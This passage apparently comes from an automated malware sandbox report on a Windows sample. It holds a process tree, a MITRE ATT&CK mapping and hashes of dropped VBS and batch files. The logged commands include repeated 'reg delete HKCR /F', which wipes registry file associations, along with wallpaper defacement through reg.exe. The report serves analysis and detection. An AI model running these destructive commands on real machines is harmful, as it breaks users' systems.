        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\11712.vbs
        5⤵
        
        PID:3196
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3216
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3248
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3284
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3276
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3280
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\11712.vbs
        5⤵
        
        PID:3496
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3516
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3520
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3576
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3584
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3592
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
    3⤵
    PID:900
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
    3⤵
    PID:1656
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
    3⤵
    PID:3064
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
    3⤵
    PID:1056
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
    3⤵
    PID:2444
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
    3⤵
    PID:1972
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
    3⤵
    PID:2340
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
    3⤵
    PID:928
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
    3⤵
    PID:2500
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11712.vbs"
    3⤵
    PID:2996
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    - Modifies registry class
    PID:2636
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3684
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3676
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3704
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3712
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3724
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:4072
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3312
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3376
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3396
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3484
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3548
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3412
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3432
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3640
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3620
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3636
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3656
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3664
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:1364
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:2428
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:3028
- - C:\Windows\system32\reg.exe
    reg delete HKCR /F
    3⤵
    PID:2532

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
1⤵
- System Location Discovery: System Language Discovery
PID:2804

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1276

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:3508

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:3720

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1128.vbs

Filesize
390B

MD5
aabbe725da9751315bbeeda4ef58d816

SHA1
476c78912d61e790a793c8e6606825f2b169947c

SHA256
0422247afae1a1556e7832c45f4f1913a61cbace2be53aad58967ea9e6315360

SHA512
0e1a523c947013a1a23574d125294270cb8c6b8e4fd97630f7c35122a33b9d95e7a073cbe23f0ed3f78246dd8b2db2c4401e994eace3b9e3bdbe696708b887dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\11712.vbs

Filesize
161B

MD5
e784c4d7573d246907c415d909a66c74

SHA1
636a3827882bebfdebfc3bd5f94ddaff42c2b35e

SHA256
07d56a69b596f51e35ec4860321ed64299862c2d75ea76fc8fc6b6ea1c9b9061

SHA512
132cdcb11e1575b0f2d35579b9295cd6df51aefeb4d9e7a27b92443da7ccf38920eb9df3410ab660b4e0ffe003ad037b2f1515bcd323cbd58192b3059227b290

Download Submit
C:\Users\Admin\AppData\Local\Temp\13774.vbs

Filesize
490B

MD5
93e179454db6fe9ac81112193de37cde

SHA1
4752aec95d506cac3ed9c61f0fbbd9cf6bd0cde9

SHA256
8286f8a1d4cceae4ece0de6082109286f17c1234ee09e453ac9507185068c7cc

SHA512
a38411dd6eb30050e6100bd20e79e8f4d650c1a4ad646516370f603a28900dfc424292f83cd7b49b1296bf7b25ce6ce907ef8dee964ded2e6b79475a6741f207

Download Submit
C:\Users\Admin\AppData\Local\Temp\22018.vbs

Filesize
179B

MD5
523092d53a06f5b46778a0cd7c01d0fb

SHA1
221a8244271afdbe7ce105aaf189f1dbcfa57cdb

SHA256
09c2ca44b387ae9f69f0c001729c71313bae1d935ad99723a02ebfc0d2757c3e

SHA512
72015f1a996c56b6eab20590cdb2689124b87494a2ae8fb5fb0678dfb4bfd49046f66b23b0348a70942d74664e22051d5be5994de518414baa47ad81e77400eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\24311.vbs

Filesize
236B

MD5
3a7e0a94fa88dccd40d9b76b37d06db1

SHA1
d7604ddb660898ce3b1343aa712cf5926bc68bda

SHA256
368a1589e414e50d554cf0d871bd49b11f9cd9f189876c86a5caef92d158e6a4

SHA512
19b8377a708301fb719e43433b9c0a592346ea94206870e3ba2c77f901b17598dd977fd711e591b5d0fc46982ed83e62cfbbe678eabe43de494bdde176c89fcb

Download Submit
C:\Users\Admin\AppData\Local\Temp\30706.bat

Filesize
461B

MD5
095d45518d2b30c2ed63c19b06d6b347

SHA1
5873cf77b56f8d299e56764fb457dcc209c3789b

SHA256
2e0fda6e963b795d01e0c14f7ab56ec311a4ef01b314f275d236589bc51b9a8f

SHA512
66ecd7d82e78aff1c8d8bb688a0394a124844833deed4ced3dfa821bb1ce221995b4c0d1a92aa32ed622f98396d4bd52c2fa1a28b22418be3c40422c3189dc49

Download Submit
C:\Users\Admin\AppData\Local\Temp\31961.vbs

Filesize
1KB

MD5
135594160762ab9dd80794d7b34ab32a

SHA1
638fef88bbb5d310c51eda07ca10918a482ad3ac

SHA256
531eef292dba871300a5b31d9601bab2b8c03be17cc0aa28e216f82a5df01fa0

SHA512
19a8b0024abb6e22103aaf8654619ee803cb8ae2bfd21d6bb7c648a4dfb1a06936144d308cc3d0ebdd86d38b87434d2e3a152f541153d42d03b4ad767b72b54d

Download Submit
C:\Users\Admin\AppData\Local\Temp\560C.tmp\560D.tmp\560E.bat

Filesize
8KB

MD5
0a45f9a236bbcd265c0c42f31a98b97f

SHA1
c959b0487c1ab6ed111bee3d1f80bcc3032125a4

SHA256
38e4173ae8927a3bea9499ab2b9141d8f42f39383478633b0a4b98c0c661d0ff

SHA512
2935422f584afd8fde06d8838621c94205aa2ae67397b1d3ed3cb2e4d80d67e53d84cef2eaae4d3ea3c4dfc5e9282d712aab458dcd29660f9ae1215258fa1c72

Download Submit
C:\Users\Admin\AppData\Local\Temp\7083.vbs

Filesize
276B

MD5
8a9b451fd9936100f33b576bb5ec3f02

SHA1
80c92544f733ddfb96dffa296293fb2835e85f2e

SHA256
4e17707eab52e31f035b13f68cce1aa2636680abde9de955fdf1495641660455

SHA512
b11700e12cc1c921dbf3cd017595dbb18befdb5a89e80295aa99ef8d5d23d3e689bf6b011927da27cb88ac93feea8fcef822b4b7acd92c26b32d5791773e911f

Download Submit
C:\Users\Admin\AppData\Local\Temp\8678.vbs

Filesize
106B

MD5
ec385d968eea8bf5abe4587305f39c89

SHA1
6509b0bb7cb6432a4c723f37dc7593116ad57c64

SHA256
98adff52d2e37335bc6fb9811a2759ab8bd86c6ca116818114a0ab88474a6f96

SHA512
d5ff6edac9fcc50a634ff949268004bc396a07bb472fce532166140964acbbb4195e99a02dae8a426e2c4f7a9c64a89d283361340615d89ef7465acbab5b26a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab7A9E.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar7AB1.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads